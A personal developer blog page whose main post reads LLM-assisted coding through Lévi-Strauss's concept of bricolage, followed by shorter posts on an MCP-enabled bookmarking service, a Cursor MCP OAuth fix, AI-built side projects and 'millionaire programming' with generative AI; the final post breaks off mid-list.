ainoya.dev

The Stochastic Bricoleur: What Lévi-Strauss Can Teach Us About Building Software with LLMs

Sat, 28 Mar 2026 00:00:00 GMT

The other day I watched an LLM agent build a working API server. I gave it a short description of what I needed — a handful of endpoints, a database schema, authentication. Within minutes, the code was running. Tests passed. The thing worked.

And yet I couldn't shake a particular feeling. The implementation was competent but slightly alien. It chose a middleware pattern I wouldn't have reached for. It structured the error handling in a way that was functional but not quite mine. When I traced the logic, I couldn't find a single clear reason why it had assembled things in that specific order. It wasn't wrong. It was just… found, rather than designed.

I've been trying to name that feeling for a while. Recently, I think I found the word. It comes not from computer science but from a French anthropologist who died in 2009 at the age of 100. The word is bricolage.

In 1962, Claude Lévi-Strauss published La Pensée sauvage — translated into English as The Savage Mind. In it, he drew a distinction that has haunted intellectual life ever since: the distinction between the engineer and the bricoleur.

The engineer, in Lévi-Strauss's telling, subordinates each task to the availability of raw materials and tools conceived and procured specifically for the project at hand. If the right materials do not exist, the engineer creates or acquires them. The process moves from goals to means, and the means are purpose-built.

The bricoleur is different. The bricoleur works with "whatever is at hand" — a finite, heterogeneous collection of tools and materials left over from previous projects. These elements were not designed for the current task. They carry traces of their prior uses. The bricoleur's universe of instruments is closed: the rules of the game are always to make do with what is already there. The bricoleur's skill lies in recombining these elements into something that works, even though the result cannot be fully derived from any single intention. Lévi-Strauss compared the process to a kaleidoscope: a closed set of glass pieces that, when shaken, produces endlessly different patterns — but never a pattern that wasn't latent in the set from the beginning.

Lévi-Strauss introduced this concept to describe how mythological thought operates. Myths, he argued, do not invent new concepts from scratch. They take existing cultural elements — animals, kinship roles, natural phenomena — and rearrange them to address fundamental contradictions. The result is a kind of intellectual bricolage: functional, often brilliant, but operating within a universe of pre-existing fragments rather than creating from nothing.

I want to suggest that this is among the most apt descriptions available for what happens when an LLM generates code.

The training corpus is the raw material from which the closed set is distilled. The learned weights are the pre-constrained elements — statistical traces of patterns encountered during training, compressed into parameters. The output is not a recombination of the corpus itself, but a reconstruction from these traces: shaped by what was in the training data, but not a direct reassembly of it. When an LLM writes a function, it is not engineering in Lévi-Strauss's sense — it is not subordinating the task to purpose-built means. It is reaching into a vast but finite landscape of learned patterns, selecting fragments that statistically fit the current context, and assembling them into something that works. The fragments carry echoes of their origins: coding conventions absorbed from thousands of repositories, idioms from languages the model was trained on, architectural patterns internalized without attribution. The logic of the output is real, but it belongs to the statistical landscape, not to a designer.

A necessary caveat before we go further. This essay borrows Lévi-Strauss's operational concept — bricolage as a description of how things get made — but does not adopt his structuralist metaphysics wholesale. His broader claims — that all human cultures share universal deep structures, that synchronic analysis has priority over historical explanation — have been rightly challenged by post-structuralist, postcolonial, and Marxist anthropologists. We do not need to believe in invariant mental structures to observe that LLMs recombine pre-existing fragments within a closed set. The analogy works at the level of process, not ontology. We are borrowing Lévi-Strauss's lens, not his worldview.

Once you see LLM-assisted development as bricolage, the structural parallels multiply. An important distinction is necessary here: these parallels apply most directly to the bare model — the weights and architecture before any external augmentation. A bare LLM, without tools or retrieval, operates within a closed set in a way that closely mirrors Lévi-Strauss's bricoleur. Once you add RAG, tool use, or execution feedback, the system begins to break out of that closure — but the base layer remains bricolage, and understanding it as such is what makes the augmentation strategies legible. More on this later.

Consider what Lévi-Strauss said about the bricoleur's repertoire: it is finite, it is heterogeneous, and its contents bear no necessary relation to the current project. This is a fitting description of a training corpus. The data that an LLM learned from was not curated for your particular problem. It is the accumulated residue of millions of prior constructions — Stack Overflow answers, GitHub repositories, blog posts, documentation — gathered without regard for coherence or purpose. The model's "knowledge" is not knowledge in any intentional sense; it is a stock of statistical traces whose presence is contingent on what happened to be available when the corpus was assembled.

The elements carry traces of their prior uses. When an LLM generates a React component, the patterns it produces are not freshly derived from the semantics of your application. They are echoes of patterns that appeared in thousands of other applications, for thousands of other purposes. The model cannot fully separate a pattern from the context in which it was learned. This is why LLM-generated code sometimes feels subtly off — not wrong, but inflected by intentions that are not yours. The traces of prior use are baked in.

There is no single authoritative origin. The bricoleur's output, Lévi-Strauss observed, cannot be traced to a single source. It is a blend, an assemblage. LLM outputs share this quality. A generated function is a probabilistic composite shaped by thousands of examples, and it is rarely reducible to a single traceable origin. Of course, the human who wrote the prompt, selected the output, and edited the result has a real claim to authorship — this is not a "death of the author" argument. But the raw material the model works with resists attribution to any single source, and its assembly follows statistical logic rather than individual intention. This is why questions of attribution in AI-generated code are so vexed — not because the human contributed nothing, but because the output is difficult to reduce to a single author or origin.

And the human using the LLM? Also a bricoleur. When you steer an agent — adjusting prompts, splicing outputs, routing through tool integrations, working around limitations — you are not engineering in any classical sense. You are tinkering. You are rearranging the outputs of a system you do not fully control, combining them with your own knowledge and constraints, producing something that works through iteration rather than derivation. The entire workflow, from model to user, is bricolage all the way down.

Jacques Derrida, critiquing Lévi-Strauss in 1966, made an observation that now reads like prophecy. In his reading, the engineer is a myth produced by the bricoleur — a fiction of pure, self-originating design that no one actually inhabits. There is no pure engineer, Derrida argued. Everyone borrows concepts from an inherited repertoire. The notion that anyone constructs a system entirely from first principles is itself a fiction — a comforting story that bricoleurs tell about an idealized figure who does not exist. In the LLM era, Derrida's point has become impossible to ignore. The myth of the engineer-programmer — the developer who writes every line from pure logic, who designs before implementing, who fully understands the system they create — was never quite the whole story, even before LLMs. Anyone who has shipped production software knows that improvisation, copy-paste, and pragmatic compromise have always been part of the process. LLMs have simply made the bricolage impossible to ignore.

The idea of connecting programming to bricolage is not new. And broader discussions linking LLMs to recombination or remix culture certainly exist. What I have not found, however, is a sustained argument that treats LLM-agent software development specifically through the lens of Lévi-Strauss's bricolage — with its particular emphasis on the closed set, the trace of prior use, and the kaleidoscope problem. That is the connection this essay attempts to make. The intellectual genealogy is worth tracing, both to acknowledge prior work and to locate what remains underexplored.

In 1990, Sherry Turkle and Seymour Papert published "Epistemological Pluralism and the Revaluation of the Concrete," in which they applied Lévi-Strauss's concept directly to programming. They identified a "bricoleur style" of coding: bottom-up rather than top-down, iterative rather than planned, proceeding by sculpting and rearranging rather than by specification. In their account, the bricoleur programmer works more like a painter than an architect — stepping back after each change to observe the effect before deciding what to do next. This was prescient work, but it was about human programming styles — about how certain people prefer to code. It did not address the question of what happens when the code is generated by a machine whose entire mode of operation is bricolage.

In 2021, Emily Bender and colleagues published "On the Dangers of Stochastic Parrots," in which they argued that LLMs stitch together linguistic forms from training data based on probabilistic patterns, without engaging with meaning in the way humans do. Read this description carefully and compare it to Lévi-Strauss's account of bricolage — the recombination of pre-existing elements according to structural rules, without transparent reference to underlying intentions. The two descriptions are structurally similar. But Bender's paper never mentions Lévi-Strauss, and the "stochastic parrot" metaphor frames the phenomenon primarily as a deficiency — a failure to achieve true understanding. The bricolage frame offers something different: not a diagnosis of failure, but a recognition of a distinct mode of creation. Whether LLMs possess some form of internal representation or semantic structure is an active area of research; what matters for our purposes is that their outputs are assembled from pre-existing patterns in a way that Lévi-Strauss would have immediately recognized.

Earlier still, the biologist François Jacob applied Lévi-Strauss's concept to evolution itself. In his 1977 paper "Evolution and Tinkering," Jacob argued that natural selection does not design organisms from scratch. It repurposes existing structures for new functions. Feathers evolved for thermal insulation and were later co-opted for flight. The vertebrate jaw was assembled from bones that once served as gill supports in fish. Evolution is not engineering; it is tinkering — or, in Lévi-Strauss's term, bricolage. The analogy to LLMs is direct: the model repurposes code patterns that were "evolved" for entirely different purposes, applying them to problems their original authors never imagined.

In the research I have been able to survey, I have not found a sustained reading of LLM-agent development through the specific apparatus of Lévi-Strauss's bricolage — the closed set, the kaleidoscope, the transformation theory of Mythologiques. The pieces are all in the literature; they have simply not been assembled. This essay is an attempt at that assembly — which is, of course, itself an act of bricolage.

Lévi-Strauss did not stop at bricolage. In his four-volume masterwork Mythologiques (1964–1971), he tracked how myths transform as they travel across cultures — from the southern tip of South America northward through the continent. A myth about the origin of fire becomes, in a neighboring culture, a myth about the origin of cooking. The narrative elements shift, but the underlying structure of oppositions — raw and cooked, nature and culture — persists through transformation. The elements are finite. The transformations are systematic. The variants are related not by descent from a common ancestor but by structural correspondence.

This is what LLMs do with code. Given the same prompt, different models — or the same model at different temperatures — produce variants. These variants are structurally related but locally adapted. They are not copies and they are not independent inventions. They are transformations of a shared repertoire, shaped by the statistical landscape of the training data. The corpus is the myth cycle. Each generation is a transformation, not a creation.

But Lévi-Strauss's critics identified a fundamental problem with the kaleidoscope metaphor: structural closure. The kaleidoscope can produce endlessly different patterns, but it can never introduce a genuinely new element. The glass pieces are fixed. The system is closed. For innovation that transcends recombination, you need something from outside the set. This criticism maps onto a baseline limitation of LLMs: a bare model, without tools, cannot reason beyond its training distribution. It can recombine brilliantly, but it cannot invent what was never in the corpus. In practice, of course, modern LLM-based systems are rarely bare — RAG, tool use, execution feedback, and external memory all breach the closure. The kaleidoscope metaphor is most useful not as a final description of what LLM systems are, but as a description of the default they must be actively designed to escape.

Here a fair objection must be addressed. If bricolage is defined broadly enough, any generative process qualifies, and the concept risks being unfalsifiable. This essay does not claim to have discovered a scientific law. The value of the bricolage frame is not predictive but prescriptive — it is a design heuristic. If you accept that an LLM operates within a closed set, specific architectural consequences follow. These consequences are concrete, testable, and immediately useful. The framework earns its keep not by being provably true but by generating better design decisions than the alternative framing of LLMs as "imperfect engineers." The proof is in the architecture you build.

So how do you escape the kaleidoscope? Three strategies, each rooted in a different theoretical response to structuralism's limits.

The first is to introduce external elements. The anthropologist Tim Ingold criticized Lévi-Strauss for treating the elements of bricolage as stable and fixed. In reality, Ingold argued, creative materials are always in flux — they emerge, transform, and decay. In the LLM context, this translates to connecting the model to live data: retrieval-augmented generation, web search, tool use, API integrations. When you wire an LLM to an MCP server that queries a live database, you are injecting elements that were not in the training corpus. The glass pieces of the kaleidoscope are no longer fixed. The set is no longer fully closed. This is not a minor architectural detail — it is the primary mechanism by which LLM-based systems transcend their training distribution.

The second strategy is to create feedback loops. Jacob's evolutionary tinkering offers the model here. In biological evolution, the raw material is pre-existing structures, but those structures are transformed through contact with the environment. Selection pressure reshapes the repertoire over time. In LLM agent workflows, this corresponds to the generate-test-error-regenerate cycle. The agent writes code, the runtime environment tests it, errors feed back as new input, and the agent revises. Each iteration is not merely a recombination of the original corpus — it is a recombination informed by real-world feedback that was not part of the training data. Emergent properties arise that no single training example contained. This is how evolution produces novelty from tinkering, and it is how agent loops produce solutions that exceed mere pattern matching.

The third is to collide multiple closed systems. Derrida, in his critique of Lévi-Strauss, proposed that meaning arises not from structure alone but from play (jeu) — the endless displacement and substitution of elements within and between systems. In practice, this means multi-model orchestration: routing different parts of a task to different models, each trained on different data with different biases and blind spots. The interface between two closed systems produces patterns that neither system contains alone. This is not a theoretical nicety — it is a practical technique that developers are already using, often without realizing it has a name.

The deeper lesson is that the architecture around the LLM matters more than the LLM itself. The model is a kaleidoscope. What you build around it — the data pipelines, the feedback loops, the tool integrations, the orchestration layer — determines whether the output stays within the closed set or transcends it. Bricolage is not a deficiency to overcome. It is a mode of creation to design for.

Now let us return to where we began — with names. What follows is interpretation, not corporate history. I have no evidence that anyone at Anthropic was thinking about Lévi-Strauss when they named their products. But the resonances are there, and they are worth reading — not as proof of intent, but as a symptom of convergence.

Anthropic's AI is called Claude. The origin of the name has never been officially explained in detail; it is often read as a nod to Claude Shannon, the founder of information theory. Whether or not that reading is correct, it is a productive one. Shannon's central insight was that information is a statistical property of signals, independent of their semantic content. Meaning, for Shannon, is not what a message says but how it is structured relative to alternatives. LLMs operate on a fundamentally similar substrate — statistical structure over tokens — whatever internal representations they may or may not develop along the way.

But the company is called Anthropic. The word shares its Greek root — anthropos, human — with anthropologie, the discipline that Claude Lévi-Strauss transformed. The anthropic principle in cosmology holds that the universe appears designed because we observe it from within: the observer is constitutive of the observation. Applied to LLMs, this principle illuminates why their outputs seem intelligent — we, the observers, project meaning onto statistically structured text. The appearance of understanding is, at least in part, a property of the reader, not the writer.

And then there is Constitutional AI, the training technique that defines Anthropic's approach to alignment. The model is trained to adhere to a set of principles — a constitution — that shapes its behavior from the inside. Not external rules imposed by a censor, but internal structural constraints that generate appropriate behavior across novel situations. Lévi-Strauss spent his entire career demonstrating a strikingly similar mechanism: how structural constraints — the incest taboo, the rules of myth transformation, the grammar of kinship — generate meaning and order without a designer, without a central authority, without anyone deciding what the system should produce. One can read Constitutional AI as structural anthropology applied to neural networks. Whether its creators would accept that reading is another matter.

But the naming goes deeper still. Consider the model tiers: Opus, Sonnet, Haiku. I am not claiming that Anthropic chose these names with Lévi-Strauss in mind. What I am claiming is that the names, once chosen, are legible through his framework in a way that illuminates something real about what the models do.

Lévi-Strauss explicitly structured Mythologiques as a musical composition. The first volume opens with an "Ouverture" and proceeds through "Theme and Variations," "Fugue," and "Cantata." He argued that myth and music are isomorphic — both generate meaning through the simultaneous reading of a horizontal axis (melody, narrative) and a vertical axis (harmony, structural correspondences). Opus — a musical work number — can be read in this lineage: the largest model as the most elaborated composition.

Sonnet. Fourteen lines. Fixed rhyme scheme. A volta at the turn. The sonnet is a form defined entirely by structural constraint. It does not produce meaning despite its rules but because of them. This is bricolage in its purest form: a closed formal system that generates infinite expression through the recombination of finite elements. It is also Constitutional AI in miniature — behavior shaped by internal rules, not external policing.

Haiku. Five-seven-five. Seventeen syllables. The most extreme formal compression in world poetry: maximum meaning from minimum structure. And it is a non-Western form. One can read its presence alongside the European sonnet and the Western classical opus as resonating — whether intentionally or not — with the universalism that Lévi-Strauss spent his career defending: the claim that structural creativity is not the monopoly of any single tradition.

The scalar hierarchy — Opus (large), Sonnet (medium), Haiku (small) — is suggestive. In structural anthropology, the same transformational rules operate at every scale. A myth cycle spanning an entire continent and a single village folktale are governed by the same structural logic. Whether or not Anthropic intends the analogy, the architecture does embody it: the same constitutional principles shape behavior across model sizes.

All three forms share a single property: finite constraint is the precondition for creative generation. An opus without form is noise. A sonnet without rules is free verse. A haiku without compression is just a sentence. Constraint is not the enemy of creation — it is its engine.

Whether Anthropic's naming was deliberate or intuitive or simply coincidental, the reading holds. Every layer of the product taxonomy — company, model, tiers — can be read as encoding a thesis that Lévi-Strauss, Shannon, and Jacob each arrived at from different directions: structure without intention can produce something that functions as if it were designed. Evolution says yes. Myth says yes. Information theory says yes. Anthropic is betting its company on the same answer — with the addendum that the right constraints make all the difference.

I am not arguing that Anthropic is secretly a structuralist enterprise. I am arguing that the problem they are working on — how to make a system behave well through internal constraints rather than external supervision — is the same problem Lévi-Strauss identified in myths, Jacob identified in evolution, and Shannon formalized in communication. The convergence is in the problem, not necessarily in the intent. Either way, it is hard to look at a company called Anthropic, making a model called Claude, trained by Constitutional AI, and tiered as Opus, Sonnet, and Haiku, and not hear echoes of La Pensée sauvage — even if those echoes were never intended.

There is a question at the bottom of all this, and it is not a theoretical one.

The engineering mindset says: specify, design, implement, verify. The bricoleur mindset says: try, adapt, recombine, iterate. For most of the history of software, we pretended the first was what we did, even as the second was what actually happened. LLM agents have made the pretense untenable. Bricolage is now the dominant mode of software creation whether we acknowledge it or not.

The question, then, is not whether to be a bricoleur. You already are. The question is whether you will be a reflective bricoleur — one who understands the structural closure of their tools, designs feedback loops that break it, builds architectures that multiply the interfaces between closed systems, and knows exactly when to reach outside the kaleidoscope for something the glass pieces cannot provide.

One of Lévi-Strauss's key observations was that mythical thought totalizes — it takes whatever fragments are at hand and assembles them into a coherent whole. The LLM does the same thing. The difference — the only difference that matters — is what you build around it.

References:

Lévi-Strauss, C. (1962). La Pensée sauvage. Paris: Plon. [English: The Savage Mind, 1966] — Chapter 1: "The Science of the Concrete" (MIT)

Lévi-Strauss, C. (1964–1971). Mythologiques I–IV. Paris: Plon. — Wikipedia overview

Derrida, J. (1967). "Structure, Sign, and Play in the Discourse of the Human Sciences." In Writing and Difference. — Full text (UCI)

Jacob, F. (1977). "Evolution and Tinkering." Science, 196(4295), 1161–1166. — Science (DOI)

Turkle, S. & Papert, S. (1990). "Epistemological Pluralism and the Revaluation of the Concrete." Signs, 16(1). — Full text (papert.org)

Bender, E. M. et al. (2021). "On the Dangers of Stochastic Parrots: Can Language Models Be Too Big?" Proceedings of FAccT '21. — ACM (DOI)

Baker, T. & Nelson, R. E. (2005). "Creating Something from Nothing: Resource Construction through Entrepreneurial Bricolage." Administrative Science Quarterly, 50(3). — SAGE Journals (DOI)

Anthropic. (2026). "Claude's New Constitution." — anthropic.com

Building and Maintaining the Pokke Docs with Starlight and LLMs

Thu, 26 Feb 2026 00:00:00 GMT

I built the documentation site for Pokke using Starlight, which is available at docs.pokke.femto-cloud.com.

I designed it with the intention of generating the content directly from source code and design documents using LLMs. The site is built to support both Japanese and English.

Since AI tools like Jules and Codex have built-in features for scheduling tasks, I run them periodically to maintain the site. They automatically fix documentation errors and write updates for newly added features. It is a very convenient setup that makes documentation maintenance much easier.

A Simple but Powerful Bookmark Feature: Routing Prompts to Your Own AI Subscriptions

Thu, 19 Feb 2026 00:00:00 GMT

I recently added a very simple, yet effective feature to pokke, a personal bookmarking service I am developing.

It is a feature that allows users to attach custom URL links to their saved bookmarks. By using simple variables like {{url}}, {{title}}, and {{description}}, the system dynamically generates a link tailored to that specific bookmark.

The most practical use case for this is passing a prompt with the bookmark's context directly to an AI search engine like Perplexity. For example, you can configure a custom URL like this:

https://www.perplexity.ai/?q=URL%3A%20{{url}}%0Atitle%3A%20{{title}}%0Adescription%3A%20{{description}}%0APlease%20explain%20the%20content%20of%20the%20specified%20URL%20in%20detail.%0AAlso%2C%20please%20suggest%20some%20interesting%20pages%20on%20related%20topics.

URL: {{url}}
title: {{title}}
description: {{description}}
Please explain the content of the specified URL in detail.
Also, please suggest some interesting pages on related topics.

With just one click from a saved bookmark, this instantly hands over the article's context to Perplexity, asking it to explain the content in detail and suggest related topics. It dramatically shortens the path from "saving for later" to actually "learning from it."

You might wonder why I didn't just integrate an LLM API directly into Pokke to summarize articles automatically in the background.

The main advantage of using URL queries instead of backend APIs is cost efficiency through leveraging the user's existing SaaS subscriptions. By simply passing the query to a service the user is already paying for (like a Perplexity Pro account), I can offer advanced AI capabilities without bearing the heavy LLM API costs on the service side. It is a win-win for both the developer and the user.

However, there is a clear trade-off. Because it relies on external URL routing rather than a backend agent, it cannot be fully automated. The AI won't summarize the article the moment you save it; it still requires the user's manual action (a click) to trigger the process.

Despite the slight friction of needing a manual click, this "Bring Your Own SaaS" approach fits perfectly for small-scale or personal projects. It is a lightweight feature that significantly enhances how I interact with the information I collect.

Building a Digital Toy for Children Without Writing a Single Line of Code

Sun, 15 Feb 2026 00:00:00 GMT

I recently created a simple digital toy called Emoji Shower. The concept is straightforward: tapping the screen or hitting keys showers the display with various emojis. It is a sensory, web-based experience designed for young children.

Demo: Emoji Shower

The most notable part of this project was the development process. I did not write a single line of code manually. By using AI (Codex), I translated a high-level concept directly into a functional web application.

The automation extended beyond just the source code. I tasked the AI with handling the infrastructure by using the gh api command to configure GitHub Pages and manage the deployment process autonomously.

This experience highlights a shift in technical prototyping. As an engineer, the role transitioned from "builder" to "director." When the friction of syntax and deployment configuration is removed, the distance between an idea and a tangible result becomes near zero. For a small project like this, this AI-driven approach is becoming the new standard for rapid implementation.

The Flow of Invisible Transcription

Wed, 04 Feb 2026 00:00:00 GMT

I’ve been trying out the voice input feature in Antigravity (specifically testing the UI in version 1.15.8), and it sparked a realization about how we interact with voice UIs.

Most tools display text in real-time as you speak. While technically impressive, this creates a cognitive burden. As the words appear, your brain involuntarily switches from "speaking" mode to "editing" mode. You start spotting errors or rethinking phrasing mid-sentence, which breaks your train of thought.

Antigravity behaves differently. It uses a simple recorder UI that hides the transcription process entirely. You speak, and the text generates only after you finish.

This visual-free approach removes the distraction of immediate self-correction. Because modern AI models are now accurate enough to be trusted without constant supervision, we no longer need to monitor the output in real-time.

I also suspect a technical upside: by decoupling the UI from the immediate transcription, the system might be free to prioritize capturing the broader context rather than striving for strict, word-for-word accuracy.

By hiding the visual feedback, the tool allows you to focus entirely on articulating the thought itself, making the drafting process significantly smoother.

Fixing "Invalid OAuth error response" When Connecting Cursor to a Custom MCP Server

Mon, 12 Jan 2026 00:00:00 GMT

I recently encountered a cryptic error while building a custom Model Context Protocol (MCP) server and attempting to connect it to the Cursor editor.

Even though I intended to use simple API Key authentication, Cursor threw an unhandledRejection immediately upon connection. The error message was confusing, seemingly pointing to a syntax issue in a JSON response that I hadn't explicitly sent.

Here is what happened, how I debugged it, and why adhering strictly to the MCP authorization specification fixed the issue.

The Error

When attempting to add my local MCP server to Cursor, the connection failed with the following error output:

Error (unhandledRejection): HTTP 404: Invalid OAuth error response: SyntaxError: Unexpected non-whitespace character after JSON at position 4 (line 1 column 5). Raw body: 404 Not Found
ServerError: HTTP 404: Invalid OAuth error response: SyntaxError: Unexpected non-whitespace character after JSON at position 4 (line 1 column 5). Raw body: 404 Not Found

At first glance, the SyntaxError suggests a malformed JSON response. The specifically mentioned "position 4" is a hint: if the raw body is 404 Not Found, the parser reads 404 (a valid number in JSON) but chokes on the space and subsequent text that follows.

This meant Cursor was receiving a plain text 404 Not Found response but was expecting a JSON object.

The Investigation

To understand where this 404 was coming from, I checked the access logs of my custom MCP server. I noticed that immediately upon connection, Cursor was making a GET request to a specific path:

GET /.well-known/oauth-authorization-server

My server returned a 404 Not Found status code because I hadn't implemented any OAuth endpoints. I was relying solely on API keys passed via headers or environment variables.

However, Cursor's MCP client implementation appears to proactively check for OAuth support by probing this standardized endpoint. When it received a 404 text response, its internal logic—likely trying to parse an OAuth error configuration—crashed.

The Solution: Return 401, Not 404

I consulted the MCP Authorization Specification to see how authentication challenges should be handled.

The specification states:

MCP clients MUST be able to parse WWW-Authenticate headers and respond appropriately to HTTP 401 Unauthorized responses from the MCP server.

Although returning 404 for a missing endpoint is standard HTTP, Cursor's client implementation failed to parse the text response. However, the MCP specification strictly mandates how clients must handle 401 responses. By returning 401, I forced Cursor to enter its spec-compliant error handling flow, effectively bypassing the crash.

The Fix

I modified my server's middleware. Instead of letting the request fall through to a generic 404 handler for the .well-known path, I ensured it returned a 401 Unauthorized status code.

Once I deployed this change:

Cursor probed /.well-known/oauth-authorization-server.
My server returned 401 Unauthorized.
Cursor correctly interpreted this as "OAuth not available" or "Authorization required" without crashing on JSON parsing.
It successfully fell back to using the configured API Key method.

Conclusion

If you see an "Invalid OAuth error response" in Cursor, check your access logs. You might be returning a 404 where a 401 is expected.

Turning My Bookmark Service into a Personal AI Librarian with MCP

Mon, 12 Jan 2026 00:00:00 GMT

In a previous post, I introduced pokke, a minimalist bookmarking service I built for my own use. The goal was simple: a place to toss interesting URLs without the friction of heavy, commercial alternatives.

However, as with any "read later" service, I soon ran into a familiar problem. My collection of bookmarks was growing, but my consumption wasn't keeping up. It was becoming a graveyard of good intentions—a list of articles I wanted to read but rarely revisited.

I realized that simply storing links wasn't enough. I needed a way to make this information active. I didn't want to search my bookmarks; I wanted my bookmarks to find me, and more importantly, I wanted them to connect with the things I was already thinking about.

Enter the Model Context Protocol

I've been experimenting with the Model Context Protocol (MCP), an open standard that allows AI models to interact with external data and tools. It occurred to me that pokke shouldn't just be a database; it should be an MCP server.

The implementation was surprisingly straightforward. I exposed a /mcp endpoint on the pokke API. By doing this, I could plug my custom bookmark service directly into an AI environment (like Claude Desktop) just by adding a simple configuration:

{
  "mcpServers": {
    "pokke-api": {
      "type": "http",
      "url": "https://api.pokke.femto-cloud.com/mcp",
      "headers": {
        "Authorization": "Bearer ${POKKE_API_KEY}"
      }
    }
  }
}

This JSON snippet effectively turns my passive database into an active tool that an AI agent can query.

Connecting the Dots

The real power of this setup isn't just in summarizing articles—generic AI tools can do that. The goal was to build a bridge between new information (my bookmarks) and existing context (my local knowledge base/notes).

I created a prompt to act as a "librarian." I asked the AI to digest my recent bookmarks, categorize them, and—crucially—connect them to topics I have stored in my local file system (my "second brain").

Here is the prompt I used:

Use the pokke MCP to summarize the digest of recent pokke bookmark articles. Divide them by category. Please indicate what I am interested in and provide suggestions linking them to the knowledge currently in my file system. Also, include advice on what keywords I should use to deepen my thinking in future intellectual exploration activities. Write it out to a markdown file named with the date and time.

The result was fascinating. The AI didn't just tell me what the articles were about; it told me why they mattered to me.

For example, when it analyzed an article about uv (the Python package manager), it didn't just stop at "it's fast." It linked the article to my existing notes on Rust tooling:

How uv got so fast

Insight: You have an interest in Rust through your study note Implementing Transformer in Rust.md. The case of uv suggests that performance comes not just from the language speed but from design and adherence to modern standards. This is a key takeaway for your own tool development.

Similarly, it found a deep connection between a seemingly unrelated article about the "Leftpad" problem and my notes on testing strategies:

Breaking “provably correct” Leftpad

Insight: This relates to the discussions in Testing.md and TestPyramid.md. The gap between being "according to spec" and "according to user expectation" cannot always be bridged by formal methods alone. Even "provably correct" code can fail in the face of messy realities like Unicode implementation details.

A Growing Trend

I’m not the only one exploring this direction. I recently watched a demonstration by Algolia, Prototype an AI-Powered Bookmark Manager with n8n and Algolia MCP server, where they used MCP to build a searchable, intelligent bookmark manager. It validates the idea that we are moving away from static lists toward dynamic, AI-assisted knowledge management.

However, my approach differs slightly in that I am less interested in search and more interested in synthesis. I want the AI to act as a catalyst, mixing fresh external inputs with my internal accumulated knowledge to spark new ideas.

Closing the Loop

The next step is automation. I plan to set up a workflow where this "Digest & Insight" report is generated automatically every week and sent to my Slack.

Imagine receiving a weekly notification that says: "Here are the articles you saved, here is how they relate to the code you wrote last month, and here are the concepts you should explore next."

By turning pokke into an MCP server, it has evolved from a simple storage bin into an active partner in my intellectual life. It’s no longer just about saving URLs; it’s about ensuring that the information I consume actually feeds into my growth as an engineer.

Pokke: A small bookmarking service for my own use

Sun, 11 Jan 2026 00:00:00 GMT

Like many developers, I relied on Pocket for years to save articles for later reading. When the service shut down in 2025, I was forced to look for a replacement.

I looked around at the available options—from Obsidian Web Clipper to Notion—but nothing felt quite right. I didn't want a complex system; I just wanted a simple buffer for my thoughts. So, I decided to build my own solution: Pokke.

Why Not Existing Tools?

Before building Pokke, I considered two popular alternatives, but neither fit my specific workflow.

Obsidian Web Clipper

I use Obsidian heavily, and while its web clipper is excellent, I found that clipping everything directly into my vault created too much noise. My Obsidian vault is for refined, permanent knowledge. Sending every interesting link there made the graph messy and difficult to navigate. I needed a staging area—a place to hold information temporarily before I decided to process it deeply.

Notion

Notion is undeniably powerful and could easily handle bookmark management. However, I simply don't use Notion in my daily life. Adopting a massive, all-in-one workspace just to save a few URLs felt like overkill. I wanted a tool that fit into my existing habits, not one that required me to change them.

Introducing Pokke

Pokke (hosted at pokke.femto-cloud.com) is a small-scale SaaS I developed to fill this gap.

The name is a nod to its predecessor, but the philosophy is strictly personal. It is designed to be a quiet space for intellectual inquiry, free from the social features and algorithmic suggestions that have cluttered so many other services.

How It Works

I kept the architecture and workflow intentionally modest to ensure maintainability.

Capture: I built a simple Chrome Extension that sends the current URL to my API.
Storage: The backend is a lightweight cloud-deployed service that stores the links.
Learning: I don't just let links rot in a list. I access my bookmarks via the API and often use Generative AI to summarize articles or extract key concepts. This helps me efficiently decide what to learn next.

It’s not a groundbreaking platform, but it’s a tool that fits my hand perfectly. Sometimes, that is all you need.

The New "Millionaire Programming": Throwing Generative AI at the Problem

Tue, 23 Dec 2025 00:00:00 GMT

Introduction: The "Millionaire" Philosophy

In the Japanese software engineering community, there is a concept known as "Millionaire Programming" (富豪的プログラミング).

The term was originally coined by UI researcher Toshiyuki Masui in his essay on utilizing computing resources (known for his work on predictive text input and user interfaces). In English, the closest equivalent nuance to his philosophy is the idiom: "Throwing hardware at the problem."

Traditionally, this approach prioritized development speed over runtime efficiency. Instead of spending weeks optimizing an algorithm to save 100MB of RAM, a "millionaire" programmer would simply utilize the abundance of modern hardware. We accepted that "hardware is cheap, but programmers are expensive," and we solved problems by spending machine resources lavishly.

However, with the advent of the AI era, this concept is undergoing a fundamental transformation.

We are moving from throwing hardware resources at performance bottlenecks to throwing code generation effort at architectural uncertainty.

In an age where AI can instantly generate ten different implementation patterns, we have acquired a level of "abundance" that allows us to solve problems by spending generative cycles.

Old School: Throwing Hardware at the Problem

The traditional "Millionaire" approach was a strategy of substitution.

graph LR
    A["Problem: Slow Performance"] --> B["Option A: Optimize Code (Expensive Human Time)"]
    A --> C["Option B: Upgrade Server (Cheap Resource)"]
    C --> D[Problem Solved]

We utilized garbage collection, heavy frameworks, and verbose data structures. We didn't mind if the code was resource-hungry, as long as it was robust and easy to write. We used the "wealth" of Moore's Law to bypass the "poverty" of human time constraints.

The Constraint: Even with this approach, we were limited by human throughput. We could throw hardware at the code, but we still had to write the code ourselves.

New School: Throwing AI at the Problem

In the AI era, the definition of "wealth" has changed. We are no longer just resource-rich; we are generation-rich.

We can now afford to be "wasteful" with code generation. We can "throw" tokens and inference costs at a problem to explore the solution space.

graph TD
    A[Problem: Architectural Uncertainty] --> B[AI Parallel Generation]
    B --> C[Throw AI at Idea 1]
    B --> D[Throw AI at Idea 2]
    B --> E[Throw AI at Idea 3]
    C --> F[Comparison & Evaluation]
    D --> F
    E --> F
    F --> G[Selection & Refinement]

The Shift in Workflow

1. Simultaneous Parallel Generation Previously, comparing three different architectural approaches (e.g., Redux vs. Context API vs. Zustand) required significant reading and mental modeling. Now, I can simply ask an LLM to implement the feature using all three patterns.

I am throwing generative cycles at my own uncertainty. I can look at the actual code for all three approaches side-by-side before writing a single line of my own. I spend the AI's "effort" to buy my own "certainty."

2. The "Disposable Prototype" Pattern In the past, "Fail Fast" was a slogan. Now, "Fail Parallel" is a reality. I often ask AI to write a quick, dirty script just to validate an idea. If it fails, I discard it immediately. The cost of throwing away code has dropped to near zero because the cost of generating it is near zero.

Benefits of Generative Abundance

1. Expanding the Search Space

